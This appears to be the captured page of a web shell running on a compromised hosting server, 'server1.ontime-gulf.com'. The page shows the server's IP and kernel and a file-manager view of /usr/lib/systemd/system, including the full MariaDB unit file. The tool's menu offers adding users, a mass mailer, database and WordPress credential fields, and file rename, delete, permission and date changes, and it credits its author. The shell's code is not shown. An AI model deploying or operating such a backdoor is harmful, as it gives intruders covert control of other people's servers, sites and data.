System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
lib
/
systemd
/
system
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
mysqld.service
# It's not recommended to modify this file in-place, because it will be # overwritten during package upgrades. If you want to customize, the # best way is to create a file "/etc/systemd/system/mariadb.service", # containing # .include /usr/lib/systemd/system/mariadb.service # ...make your changes here... # or create a file "/etc/systemd/system/mariadb.service.d/foo.conf", # which doesn't need to include ".include" call and which will be parsed # after the file mariadb.service itself is parsed. # # For more info about custom unit files, see systemd.unit(5) or # https://mariadb.com/kb/en/mariadb/systemd/ # # Copyright notice: # # This file is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=MariaDB 10.6.23 database server Documentation=man:mariadbd(8) Documentation=https://mariadb.com/kb/en/library/systemd/ After=network.target [Install] WantedBy=multi-user.target [Service] ############################################################################## ## Core requirements ## Type=notify # Setting this to true can break replication and the Type=notify settings # See also bind-address mariadbd option. PrivateNetwork=false ############################################################################## ## Package maintainers ## User=mysql Group=mysql # CAP_IPC_LOCK To allow memlock to be used as non-root user # These are enabled by default AmbientCapabilities=CAP_IPC_LOCK # PrivateDevices=true implies NoNewPrivileges=true and # SUID auth_pam_tool suddenly doesn't do setuid anymore PrivateDevices=false # Prevent writes to /usr, /boot, and /etc ProtectSystem=full # Doesn't yet work properly with SELinux enabled # NoNewPrivileges=true # Prevent accessing /home, /root and /run/user ProtectHome=true # Execute pre and post scripts as root, otherwise it does it as User= PermissionsStartOnly=true # Perform automatic wsrep recovery. When server is started without wsrep, # galera_recovery simply returns an empty string. In any case, however, # the script is not expected to return with a non-zero status. # It is always safe to unset _WSREP_START_POSITION environment variable. # Do not panic if galera_recovery script is not available. (MDEV-10538) ExecStartPre=/bin/sh -c "systemctl unset-environment _WSREP_START_POSITION" ExecStartPre=/bin/sh -c "[ ! -e /usr/bin/galera_recovery ] && VAR= || \ VAR=`/usr/bin/galera_recovery`; [ $? -eq 0 ] \ && systemctl set-environment _WSREP_START_POSITION=$VAR || exit 1" # Needed to create system tables etc. # ExecStartPre=/usr/bin/mysql_install_db -u mysql # Start main service # MYSQLD_OPTS here is for users to set in /etc/systemd/system/mariadb.service.d/MY_SPECIAL.conf # Use the [Service] section and Environment="MYSQLD_OPTS=...". # This isn't a replacement for my.cnf. # _WSREP_NEW_CLUSTER is for the exclusive use of the script galera_new_cluster ExecStart=/usr/sbin/mariadbd $MYSQLD_OPTS $_WSREP_NEW_CLUSTER $_WSREP_START_POSITION # Unset _WSREP_START_POSITION environment variable. ExecStartPost=/bin/sh -c "systemctl unset-environment _WSREP_START_POSITION" KillSignal=SIGTERM # Don't want to see an automated SIGKILL ever SendSIGKILL=no # Restart crashed server only, on-failure would also restart, for example, when # my.cnf contains unknown option Restart=on-abort RestartSec=5s UMask=007 ############################################################################## ## USERs can override ## ## ## by creating a file in /etc/systemd/system/mariadb.service.d/MY_SPECIAL.conf ## and adding/setting the following under [Service] will override this file's ## settings. # Useful options not previously available in [mysqld_safe] # Kernels like killing mariadbd when out of memory because its big. # Lets temper that preference a little. # OOMScoreAdjust=-600 # Explicitly start with high IO priority # BlockIOWeight=1000 # If you don't use the /tmp directory for SELECT ... OUTFILE and # LOAD DATA INFILE you can enable PrivateTmp=true for a little more security. PrivateTmp=false # Set an explicit Start and Stop timeout of 900 seconds (15 minutes!) # this is the same value as used in SysV init scripts in the past # Galera might need a longer timeout, check the KB if you want to change this: # https://mariadb.com/kb/en/library/systemd/#configuring-the-systemd-service-timeout TimeoutStartSec=900 TimeoutStopSec=900 # Set the maximium number of tasks (threads) to 99% of what the system can # handle as set by the kernel, reserve the 1% for a remote ssh connection, # some monitoring, or that backup cron job. Without the directive this would # be 15% (see DefaultTasksMax in systemd man pages). TasksMax=99% ## ## Options previously available to be set via [mysqld_safe] ## that now needs to be set by systemd config files as mysqld_safe ## isn't executed. ## # Number of files limit. previously [mysqld_safe] open-files-limit LimitNOFILE=32768 # Maximium core size. previously [mysqld_safe] core-file-size # LimitCore= # Nice priority. previously [mysqld_safe] nice # Nice=-5 # Timezone. previously [mysqld_safe] timezone # Environment="TZ=UTC" # Library substitutions. previously [mysqld_safe] malloc-lib with explicit paths # (in LD_LIBRARY_PATH) and library name (in LD_PRELOAD). # Environment="LD_LIBRARY_PATH=/path1 /path2" "LD_PRELOAD= # Flush caches. previously [mysqld_safe] flush-caches=1 # ExecStartPre=sync # ExecStartPre=sysctl -q -w vm.drop_caches=3 # numa-interleave=1 equalivant # Change ExecStart=numactl --interleave=all /usr/sbin/mariadbd...... # crash-script equalivent # FailureAction=
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-22 10:57:17
..
DIR
-
drwxr-xr-x
2025-04-23 10:57:57
basic.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
dbus.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
default.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
graphical.target.wants
DIR
-
drwxr-xr-x
2025-04-23 10:57:56
halt.target.wants
DIR
-
drwxr-xr-x
2024-03-13 04:21:01
initrd-switch-root.target.wants
DIR
-
drwxr-xr-x
2024-03-13 04:21:01
initrd.target.wants
DIR
-
drwxr-xr-x
2025-07-16 10:59:05
kexec.target.wants
DIR
-
drwxr-xr-x
2024-03-13 04:21:01
local-fs.target.wants
DIR
-
drwxr-xr-x
2025-04-23 10:57:57
mariadb@bootstrap.service.d
DIR
-
drwxr-xr-x
2025-08-07 11:01:09
multi-user.target.wants
DIR
-
drwxr-xr-x
2025-08-28 10:58:30
poweroff.target.wants
DIR
-
drwxr-xr-x
2024-03-13 04:21:01
reboot.target.wants
DIR
-
drwxr-xr-x
2024-03-13 04:21:01
remote-fs.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
rescue.target.wants
DIR
-
drwxr-xr-x
2025-04-23 10:57:56
runlevel1.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
runlevel2.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
runlevel3.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
runlevel4.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
runlevel5.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
sockets.target.wants
DIR
-
drwxr-xr-x
2025-08-28 10:58:30
sw-engine.service.d
DIR
-
drwxr-xr-x
2025-10-06 02:24:13
sysinit.target.wants
DIR
-
drwxr-xr-x
2025-07-16 10:59:05
syslog.target.wants
DIR
-
drwxr-xr-x
2025-04-22 01:58:47
system-update.target.wants
DIR
-
drwxr-xr-x
2025-10-09 10:58:23
systemd-udev-trigger.service.d
DIR
-
drwxr-xr-x
2025-04-23 10:57:57
timers.target.wants
DIR
-
drwxr-xr-x
2025-04-23 10:57:56
user-.slice.d
DIR
-
drwxr-xr-x
2025-04-23 10:57:56
NetworkManager-dispatcher.service
text/plain
641 B
-rw-r--r--
2025-08-26 09:46:12
NetworkManager-wait-online.service
text/plain
1.12 KB
-rw-r--r--
2025-08-26 09:46:12
NetworkManager.service
text/plain
1.32 KB
-rw-r--r--
2025-08-26 09:46:12
acpid.service
text/plain
249 B
-rw-r--r--
2018-11-15 10:57:15
acpid.socket
text/plain
146 B
-rw-r--r--
2018-11-15 10:57:15
aibolit-resident.service
1.13 KB
-rw-r-----
2025-10-20 10:57:02
aibolit-resident.socket
text/plain
257 B
-rw-r--r--
2025-10-20 10:57:02
arp-ethers.service
text/plain
275 B
-rw-r--r--
2020-03-18 08:22:16
atd.service
text/plain
222 B
-rw-r--r--
2022-10-10 10:23:17
atop-rotate.service
text/plain
132 B
-rw-r--r--
2022-01-08 11:49:00
atop-rotate.timer
text/plain
98 B
-rw-r--r--
2022-01-08 11:49:00
atop.service
text/plain
705 B
-rw-r--r--
2022-01-11 04:41:16
atopacct.service
text/plain
269 B
-rw-r--r--
2022-01-08 11:49:00
auditd.service
text/plain
1.81 KB
-rw-r--r--
2025-07-15 09:41:56
auth-rpcgss-module.service
text/plain
628 B
-rw-r--r--
2025-06-04 10:54:28
autovt@.service
text/plain
1.93 KB
-rw-r--r--
2025-04-22 01:58:34
basic.target
text/plain
956 B
-rw-r--r--
2025-04-22 01:57:49
bluetooth.target
text/plain
419 B
-rw-r--r--
2018-06-22 11:11:49
boot-complete.target
text/plain
455 B
-rw-r--r--
2025-04-22 01:57:59
chrony-dnssrv@.service
text/plain
209 B
-rw-r--r--
2024-11-05 07:44:41
chrony-dnssrv@.timer
text/plain
138 B
-rw-r--r--
2024-11-05 07:44:41
chrony-wait.service
text/plain
500 B
-rw-r--r--
2024-11-05 07:47:18
chronyd.service
text/plain
551 B
-rw-r--r--
2024-11-05 07:47:18
console-getty.service
text/plain
1.06 KB
-rw-r--r--
2025-04-22 01:58:34
container-getty@.service
text/plain
1.23 KB
-rw-r--r--
2025-04-22 01:58:34
cpupower.service
text/plain
294 B
-rw-r--r--
2025-10-20 08:12:24
crond.service
text/plain
356 B
-rw-r--r--
2024-04-06 11:40:04
cryptsetup-pre.target
text/plain
465 B
-rw-r--r--
2018-06-22 11:11:49
cryptsetup.target
text/plain
412 B
-rw-r--r--
2018-06-22 11:11:49
csf.service
text/plain
270 B
-rw-r--r--
2015-01-25 04:16:14
ctrl-alt-del.target
text/plain
583 B
-rw-r--r--
2018-06-22 11:11:49
dbus-org.freedesktop.hostname1.service
text/plain
1.08 KB
-rw-r--r--
2025-04-22 01:58:34
dbus-org.freedesktop.locale1.service
text/plain
1.05 KB
-rw-r--r--
2025-04-22 01:58:34
dbus-org.freedesktop.login1.service
text/plain
1.35 KB
-rw-r--r--
2025-04-22 01:58:34
dbus-org.freedesktop.portable1.service
text/plain
987 B
-rw-r--r--
2025-04-22 01:58:34
dbus-org.freedesktop.timedate1.service
text/plain
1.02 KB
-rw-r--r--
2025-04-22 01:58:34
dbus.service
text/plain
380 B
-rw-r--r--
2025-08-26 11:22:51
dbus.socket
text/plain
102 B
-rw-r--r--
2025-08-26 11:22:51
debug-shell.service
text/plain
1.03 KB
-rw-r--r--
2025-04-22 01:58:33
default.target
text/plain
598 B
-rw-r--r--
2018-06-22 11:11:49
dev-hugepages.mount
text/plain
750 B
-rw-r--r--
2018-06-22 11:11:49
dev-mqueue.mount
text/plain
665 B
-rw-r--r--
2018-06-22 11:11:49
dnf-makecache.service
text/plain
457 B
-rw-r--r--
2021-04-12 03:26:33
dnf-makecache.timer
text/plain
320 B
-rw-r--r--
2021-04-12 03:26:33
dnf-system-upgrade-cleanup.service
text/plain
322 B
-rw-r--r--
2024-04-08 10:02:45
dnf-system-upgrade.service
text/plain
601 B
-rw-r--r--
2024-04-08 10:02:45
dracut-cmdline.service
text/plain
904 B
-rw-r--r--
2018-10-08 01:38:33
dracut-initqueue.service
text/plain
821 B
-rw-r--r--
2018-10-08 01:38:33
dracut-mount.service
text/plain
793 B
-rw-r--r--
2018-10-08 01:38:33
dracut-pre-mount.service
text/plain
822 B
-rw-r--r--
2018-10-08 01:38:33
dracut-pre-pivot.service
text/plain
1.1 KB
-rw-r--r--
2018-10-08 01:38:33
dracut-pre-trigger.service
text/plain
914 B
-rw-r--r--
2018-10-08 01:38:33
dracut-pre-udev.service
text/plain
993 B
-rw-r--r--
2018-10-08 01:38:33
dracut-shutdown-onfailure.service
text/plain
309 B
-rw-r--r--
2025-07-15 09:09:22
dracut-shutdown.service
text/plain
440 B
-rw-r--r--
2025-07-15 09:09:22
ea-php72-php-fpm.service
text/plain
716 B
-rw-r--r--
2025-10-15 09:15:54
ea-php73-php-fpm.service
text/plain
716 B
-rw-r--r--
2025-10-15 09:16:50
ea-php81-php-fpm.service
text/plain
716 B
-rw-r--r--
2025-10-15 09:06:32
ea-php82-php-fpm.service
text/plain
716 B
-rw-r--r--
2025-10-15 09:08:06
ea-php83-php-fpm.service
text/plain
716 B
-rw-r--r--
2025-10-15 09:09:01
ebtables.service
text/plain
208 B
-rw-r--r--
2024-04-02 06:29:29
emergency.service
text/plain
801 B
-rw-r--r--
2025-04-22 01:58:33
emergency.target
text/plain
471 B
-rw-r--r--
2018-06-22 11:11:49
exit.target
text/plain
541 B
-rw-r--r--
2018-06-22 11:11:49
final.target
text/plain
480 B
-rw-r--r--
2018-06-22 11:11:49
firewalld.service
text/plain
674 B
-rw-r--r--
2025-03-11 09:51:08
fstrim.service
text/plain
96 B
-rw-r--r--
2024-04-06 01:02:51
fstrim.timer
text/plain
229 B
-rw-r--r--
2024-04-06 01:02:51
garb.service
text/plain
478 B
-rw-r--r--
2025-07-15 05:34:20
getty-pre.target
text/plain
506 B
-rw-r--r--
2018-06-22 11:11:49
getty.target
text/plain
500 B
-rw-r--r--
2018-06-22 11:11:49
getty@.service
text/plain
1.93 KB
-rw-r--r--
2025-04-22 01:58:34
graphical.target
text/plain
598 B
-rw-r--r--
2018-06-22 11:11:49
grub-boot-indeterminate.service
text/plain
263 B
-rw-r--r--
2025-10-07 08:06:32
gssproxy.service
text/plain
466 B
-rw-r--r--
2022-10-08 08:02:59
halt-local.service
text/plain
605 B
-rw-r--r--
2025-04-22 01:58:33
halt.target
text/plain
527 B
-rw-r--r--
2018-06-22 11:11:49
hibernate.target
text/plain
509 B
-rw-r--r--
2018-06-22 11:11:49
htcacheclean.service
text/plain
387 B
-rw-r--r--
2021-01-05 01:04:16
httpd.service
text/plain
608 B
-rw-r--r--
2020-10-16 01:41:25
hybrid-sleep.target
text/plain
530 B
-rw-r--r--
2018-06-22 11:11:49
import-state.service
text/plain
441 B
-rw-r--r--
2022-08-10 01:03:37
imunify-agent-proxy.service
text/plain
277 B
-rw-r--r--
2025-08-22 10:14:24
imunify-agent-proxy.socket
text/plain
182 B
-rw-r--r--
2025-08-22 10:14:24
imunify-antivirus-sensor.socket
text/plain
558 B
-rw-r--r--
2025-09-10 12:40:30
imunify-antivirus-user.socket
text/plain
551 B
-rw-r--r--
2025-09-10 12:40:30
imunify-antivirus.service
text/plain
964 B
-rw-r--r--
2025-09-10 12:40:30
imunify-antivirus.socket
text/plain
237 B
-rw-r--r--
2025-09-10 12:40:30
imunify-notifier.service
text/plain
388 B
-rw-r--r--
2024-10-25 12:14:24
imunify-notifier.socket
text/plain
189 B
-rw-r--r--
2024-10-25 12:14:24
initrd-cleanup.service
text/plain
674 B
-rw-r--r--
2025-04-22 01:58:33
initrd-fs.target
text/plain
593 B
-rw-r--r--
2018-06-22 11:11:49
initrd-parse-etc.service
text/plain
842 B
-rw-r--r--
2025-04-22 01:58:33
initrd-root-device.target
text/plain
561 B
-rw-r--r--
2018-06-22 11:11:49
initrd-root-fs.target
text/plain
566 B
-rw-r--r--
2018-06-22 11:11:49
initrd-switch-root.service
text/plain
593 B
-rw-r--r--
2025-04-22 01:58:33
initrd-switch-root.target
text/plain
777 B
-rw-r--r--
2025-04-22 01:58:01
initrd-udevadm-cleanup-db.service
text/plain
708 B
-rw-r--r--
2025-04-22 01:58:33
initrd.target
text/plain
763 B
-rw-r--r--
2018-06-22 11:11:49
iprdump.service
text/plain
184 B
-rw-r--r--
2020-08-30 07:37:41
iprinit.service
text/plain
143 B
-rw-r--r--
2020-08-30 07:37:41
iprupdate.service
text/plain
147 B
-rw-r--r--
2020-08-30 07:37:41
iprutils.target
text/plain
173 B
-rw-r--r--
2020-05-08 02:19:42
irqbalance.service
text/plain
475 B
-rw-r--r--
2023-10-14 05:57:37
kcare.service
text/plain
371 B
-rw-r--r--
2025-10-03 06:48:04
kdump.service
text/plain
388 B
-rw-r--r--
2024-09-24 08:36:00
kexec.target
text/plain
541 B
-rw-r--r--
2018-06-22 11:11:49
kmod-static-nodes.service
text/plain
721 B
-rw-r--r--
2025-04-22 01:58:33
kvm_stat.service
text/plain
368 B
-rw-r--r--
2025-10-20 08:12:27
ldconfig.service
text/plain
687 B
-rw-r--r--
2018-06-22 11:11:49
lfd.service
text/plain
226 B
-rw-r--r--
2025-02-28 01:10:41
libcare-autostart.service
text/plain
257 B
-rw-r--r--
2025-10-03 06:48:04
libcare.service
text/plain
262 B
-rw-r--r--
2025-10-03 06:48:04
libcare.socket
text/plain
205 B
-rw-r--r--
2025-10-03 06:48:04
loadmodules.service
text/plain
355 B
-rw-r--r--
2022-08-10 01:03:37
local-fs-pre.target
text/plain
435 B
-rw-r--r--
2018-06-22 11:11:49
local-fs.target
text/plain
547 B
-rw-r--r--
2018-06-22 11:11:49
lsapi-cache.service
text/plain
301 B
-rw-r--r--
2025-10-15 08:45:47
man-db-cache-update.service
text/plain
358 B
-rw-r--r--
2021-06-24 12:12:35
man-db-restart-cache-update.service
text/plain
301 B
-rw-r--r--
2021-06-24 12:12:35
mariadb-extra.socket
text/plain
492 B
-rw-r--r--
2025-07-28 03:57:47
mariadb-extra@.socket
text/plain
519 B
-rw-r--r--
2025-07-28 03:57:47
mariadb.service
text/plain
5.6 KB
-rw-r--r--
2025-07-28 03:57:47
mariadb.socket
text/plain
573 B
-rw-r--r--
2025-07-28 03:57:47
mariadb@.service
text/plain
9.69 KB
-rw-r--r--
2025-07-28 03:57:47
mariadb@.socket
text/plain
580 B
-rw-r--r--
2025-07-28 03:57:47
messagebus.service
text/plain
380 B
-rw-r--r--
2025-08-26 11:22:51
microcode.service
text/plain
284 B
-rw-r--r--
2025-07-15 09:51:23
multi-user.target
text/plain
532 B
-rw-r--r--
2018-06-22 11:11:49
mysql.service
text/plain
5.6 KB
-rw-r--r--
2025-07-28 03:57:47
mysqld.service
text/plain
5.6 KB
-rw-r--r--
2025-07-28 03:57:47
named-setup-rndc.service
text/plain
121 B
-rw-r--r--
2025-02-20 09:05:37
named.service
text/plain
856 B
-rw-r--r--
2025-02-21 10:57:30
network-online.target
text/plain
505 B
-rw-r--r--
2018-06-22 11:11:49
network-pre.target
text/plain
502 B
-rw-r--r--
2018-06-22 11:11:49
network.target
text/plain
521 B
-rw-r--r--
2018-06-22 11:11:49
nfs-blkmap.service
text/plain
295 B
-rw-r--r--
2025-06-04 10:54:28
nfs-client.target
text/plain
413 B
-rw-r--r--
2025-06-04 10:54:28
nfs-convert.service
text/plain
608 B
-rw-r--r--
2025-06-04 10:54:28
nfs-idmapd.service
text/plain
222 B
-rw-r--r--
2025-06-04 10:54:28
nfs-mountd.service
text/plain
287 B
-rw-r--r--
2025-06-04 10:54:28
nfs-server.service
text/plain
978 B
-rw-r--r--
2025-06-04 10:54:28
nfs-utils.service
text/plain
567 B
-rw-r--r--
2025-06-04 10:54:28
nfsdcld.service
text/plain
236 B
-rw-r--r--
2025-06-04 10:54:28
nftables.service
text/plain
393 B
-rw-r--r--
2025-01-28 01:21:07
nis-domainname.service
text/plain
378 B
-rw-r--r--
2019-10-11 01:06:50
nscd.service
text/plain
512 B
-rw-r--r--
2025-08-05 02:11:41
nscd.socket
text/plain
133 B
-rw-r--r--
2025-08-05 02:11:41
nss-lookup.target
text/plain
554 B
-rw-r--r--
2018-06-22 11:11:49
nss-user-lookup.target
text/plain
513 B
-rw-r--r--
2018-06-22 11:11:49
paths.target
text/plain
394 B
-rw-r--r--
2018-06-22 11:11:49
plymouth-halt.service
text/plain
418 B
-rw-r--r--
2022-04-18 04:44:56
plymouth-kexec.service
text/plain
418 B
-rw-r--r--
2022-04-18 04:44:56
plymouth-poweroff.service
text/plain
427 B
-rw-r--r--
2022-04-18 04:44:56
plymouth-quit-wait.service
text/plain
224 B
-rw-r--r--
2022-04-18 04:44:56
plymouth-quit.service
text/plain
218 B
-rw-r--r--
2022-04-18 04:44:56
plymouth-read-write.service
text/plain
268 B
-rw-r--r--
2022-04-18 04:44:56
plymouth-reboot.service
text/plain
420 B
-rw-r--r--
2022-04-18 04:44:56
plymouth-start.service
text/plain
563 B
-rw-r--r--
2022-04-18 04:44:56
plymouth-switch-root-initramfs.service
text/plain
372 B
-rw-r--r--
2022-04-18 04:44:57
plymouth-switch-root.service
text/plain
315 B
-rw-r--r--
2022-04-18 04:44:56
polkit.service
text/plain
172 B
-rw-r--r--
2024-05-29 12:51:10
postgresql.service
text/plain
1.42 KB
-rw-r--r--
2024-02-27 08:24:43
postgresql@.service
text/plain
1.38 KB
-rw-r--r--
2024-02-27 08:24:43
poweroff.target
text/plain
592 B
-rw-r--r--
2018-06-22 11:11:49
printer.target
text/plain
417 B
-rw-r--r--
2018-06-22 11:11:49
proc-fs-nfsd.mount
text/plain
98 B
-rw-r--r--
2025-06-04 10:54:28
proc-sys-fs-binfmt_misc.automount
text/plain
745 B
-rw-r--r--
2018-06-22 11:11:49
proc-sys-fs-binfmt_misc.mount
text/plain
655 B
-rw-r--r--
2018-06-22 11:11:49
qemu-guest-agent.service
text/plain
522 B
-rw-r--r--
2025-08-07 12:04:07
quotaon.service
text/plain
617 B
-rw-r--r--
2025-04-22 01:58:33
rc-local.service
text/plain
771 B
-rw-r--r--
2025-04-22 01:58:34
rdisc.service
text/plain
208 B
-rw-r--r--
2023-10-14 05:19:01
reboot.target
text/plain
583 B
-rw-r--r--
2018-06-22 11:11:49
remote-cryptsetup.target
text/plain
549 B
-rw-r--r--
2018-06-22 11:11:49
remote-fs-pre.target
text/plain
436 B
-rw-r--r--
2018-06-22 11:11:49
remote-fs.target
text/plain
522 B
-rw-r--r--
2018-06-22 11:11:49
rescue.service
text/plain
792 B
-rw-r--r--
2025-04-22 01:58:34
rescue.target
text/plain
492 B
-rw-r--r--
2018-06-22 11:11:49
rpc-gssd.service
text/plain
281 B
-rw-r--r--
2025-06-04 10:54:28
rpc-statd-notify.service
text/plain
387 B
-rw-r--r--
2025-06-04 10:54:28
rpc-statd.service
text/plain
414 B
-rw-r--r--
2025-06-04 10:54:28
rpc_pipefs.target
text/plain
80 B
-rw-r--r--
2025-06-04 10:54:28
rpcbind.service
text/plain
544 B
-rw-r--r--
2022-10-12 11:00:54
rpcbind.socket
text/plain
368 B
-rw-r--r--
2022-10-12 11:00:54
rpcbind.target
text/plain
540 B
-rw-r--r--
2018-06-22 11:11:49
rsyslog.service
text/plain
960 B
-rw-r--r--
2024-11-05 02:29:25
runlevel0.target
text/plain
592 B
-rw-r--r--
2018-06-22 11:11:49
runlevel1.target
text/plain
492 B
-rw-r--r--
2018-06-22 11:11:49
runlevel2.target
text/plain
532 B
-rw-r--r--
2018-06-22 11:11:49
runlevel3.target
text/plain
532 B
-rw-r--r--
2018-06-22 11:11:49
runlevel4.target
text/plain
532 B
-rw-r--r--
2018-06-22 11:11:49
runlevel5.target
text/plain
598 B
-rw-r--r--
2018-06-22 11:11:49
runlevel6.target
text/plain
583 B
-rw-r--r--
2018-06-22 11:11:49
selinux-autorelabel-mark.service
text/plain
406 B
-rw-r--r--
2024-07-02 08:22:19
selinux-autorelabel.service
text/plain
301 B
-rw-r--r--
2024-07-02 08:22:19
selinux-autorelabel.target
text/plain
230 B
-rw-r--r--
2024-07-02 08:22:19
serial-getty@.service
text/plain
1.45 KB
-rw-r--r--
2025-04-22 01:58:34
shutdown.target
text/plain
442 B
-rw-r--r--
2018-06-22 11:11:49
sigpwr.target
text/plain
402 B
-rw-r--r--
2018-06-22 11:11:49
sleep.target
text/plain
460 B
-rw-r--r--
2018-06-22 11:11:49
slices.target
text/plain
449 B
-rw-r--r--
2018-06-22 11:11:49
smartcard.target
text/plain
420 B
-rw-r--r--
2018-06-22 11:11:49
smartd.service
text/plain
329 B
-rw-r--r--
2024-04-06 02:11:24
snmpd.service
text/plain
313 B
-rw-r--r--
2025-10-07 09:19:26
snmptrapd.service
text/plain
323 B
-rw-r--r--
2025-10-07 09:19:26
sockets.target
text/plain
396 B
-rw-r--r--
2018-06-22 11:11:49
sound.target
text/plain
420 B
-rw-r--r--
2018-06-22 11:11:49
sshd-keygen.target
text/plain
123 B
-rw-r--r--
2025-09-30 10:44:14
sshd-keygen@.service
text/plain
247 B
-rw-r--r--
2025-09-30 10:44:14
sshd.service
text/plain
456 B
-rw-r--r--
2025-09-30 10:44:14
sshd.socket
text/plain
181 B
-rw-r--r--
2025-09-30 10:44:14
sshd@.service
text/plain
342 B
-rw-r--r--
2025-09-30 10:44:14
sssd-autofs.service
text/plain
472 B
-rw-r--r--
2025-06-05 07:42:52
sssd-autofs.socket
text/plain
371 B
-rw-r--r--
2025-06-05 07:42:52
sssd-kcm.service
text/plain
443 B
-rw-r--r--
2025-06-05 07:42:52
sssd-kcm.socket
text/plain
186 B
-rw-r--r--
2025-06-05 07:42:52
sssd-nss.service
text/plain
351 B
-rw-r--r--
2025-06-05 07:42:52
sssd-nss.socket
text/plain
420 B
-rw-r--r--
2025-06-05 07:42:52
sssd-pac.service
text/plain
460 B
-rw-r--r--
2025-06-05 07:42:52
sssd-pac.socket
text/plain
362 B
-rw-r--r--
2025-06-05 07:42:52
sssd-pam-priv.socket
text/plain
443 B
-rw-r--r--
2025-06-05 07:42:52
sssd-pam.service
text/plain
481 B
-rw-r--r--
2025-06-05 07:42:52
sssd-pam.socket
text/plain
391 B
-rw-r--r--
2025-06-05 07:42:52
sssd-ssh.service
text/plain
460 B
-rw-r--r--
2025-06-05 07:42:52
sssd-ssh.socket
text/plain
362 B
-rw-r--r--
2025-06-05 07:42:52
sssd-sudo.service
text/plain
481 B
-rw-r--r--
2025-06-05 07:42:52
sssd-sudo.socket
text/plain
364 B
-rw-r--r--
2025-06-05 07:42:52
sssd.service
text/plain
772 B
-rw-r--r--
2025-06-05 07:42:52
suspend-then-hibernate.target
text/plain
577 B
-rw-r--r--
2018-06-22 11:11:49
suspend.target
text/plain
503 B
-rw-r--r--
2018-06-22 11:11:49
sw-engine.service
text/plain
515 B
-rw-r--r--
1990-01-01 12:00:00
swap.target
text/plain
393 B
-rw-r--r--
2018-06-22 11:11:49
sys-fs-fuse-connections.mount
text/plain
795 B
-rw-r--r--
2018-06-22 11:11:49
sys-kernel-config.mount
text/plain
767 B
-rw-r--r--
2018-06-22 11:11:49
sys-kernel-debug.mount
text/plain
710 B
-rw-r--r--
2018-06-22 11:11:49
sysinit.target
text/plain
558 B
-rw-r--r--
2018-06-22 11:11:49
syslog.socket
text/plain
1.37 KB
-rw-r--r--
2018-06-22 11:11:49
sysstat-collect.service
text/plain
389 B
-rw-r--r--
2024-07-03 09:57:24
sysstat-collect.timer
text/plain
325 B
-rw-r--r--
2024-07-03 09:57:24
sysstat-summary.service
text/plain
369 B
-rw-r--r--
2024-07-03 09:57:24
sysstat-summary.timer
text/plain
356 B
-rw-r--r--
2024-07-03 09:57:24
sysstat.service
text/plain
475 B
-rw-r--r--
2024-07-03 09:57:24
system-update-cleanup.service
text/plain
1.38 KB
-rw-r--r--
2025-04-22 01:57:59
system-update-pre.target
text/plain
543 B
-rw-r--r--
2018-06-22 11:11:49
system-update.target
text/plain
617 B
-rw-r--r--
2018-06-22 11:11:49
systemd-ask-password-console.path
text/plain
704 B
-rw-r--r--
2018-06-22 11:11:49
systemd-ask-password-console.service
text/plain
728 B
-rw-r--r--
2025-04-22 01:58:34
systemd-ask-password-plymouth.path
text/plain
454 B
-rw-r--r--
2022-04-18 04:44:57
systemd-ask-password-plymouth.service
text/plain
435 B
-rw-r--r--
2022-04-18 04:44:57
systemd-ask-password-wall.path
text/plain
632 B
-rw-r--r--
2018-06-22 11:11:49
systemd-ask-password-wall.service
text/plain
760 B
-rw-r--r--
2025-04-22 01:58:34
systemd-backlight@.service
text/plain
760 B
-rw-r--r--
2025-04-22 01:58:33
systemd-binfmt.service
text/plain
1.07 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-coredump.socket
text/plain
537 B
-rw-r--r--
2018-06-22 11:11:49
systemd-coredump@.service
text/plain
1.08 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-exit.service
text/plain
494 B
-rw-r--r--
2025-04-22 01:58:07
systemd-firstboot.service
text/plain
799 B
-rw-r--r--
2025-04-22 01:58:34
systemd-fsck-root.service
text/plain
618 B
-rw-r--r--
2025-04-22 01:58:34
systemd-fsck@.service
text/plain
671 B
-rw-r--r--
2025-04-22 01:58:34
systemd-halt.service
text/plain
588 B
-rw-r--r--
2025-04-22 01:58:34
systemd-hibernate-resume@.service
text/plain
675 B
-rw-r--r--
2025-04-22 01:58:34
systemd-hibernate.service
text/plain
545 B
-rw-r--r--
2025-04-22 01:58:34
systemd-hostnamed.service
text/plain
1.08 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-hwdb-update.service
text/plain
826 B
-rw-r--r--
2025-04-22 01:58:34
systemd-hybrid-sleep.service
text/plain
563 B
-rw-r--r--
2025-04-22 01:58:34
systemd-initctl.service
text/plain
550 B
-rw-r--r--
2025-04-22 01:58:34
systemd-initctl.socket
text/plain
546 B
-rw-r--r--
2018-06-22 11:11:49
systemd-journal-catalog-update.service
text/plain
711 B
-rw-r--r--
2025-04-22 01:58:34
systemd-journal-flush.service
text/plain
827 B
-rw-r--r--
2025-04-22 01:58:34
systemd-journald-audit.socket
text/plain
647 B
-rw-r--r--
2025-04-22 01:57:51
systemd-journald-dev-log.socket
text/plain
1.1 KB
-rw-r--r--
2018-06-22 11:11:49
systemd-journald.service
text/plain
1.5 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-journald.socket
text/plain
882 B
-rw-r--r--
2018-06-22 11:11:49
systemd-kexec.service
text/plain
601 B
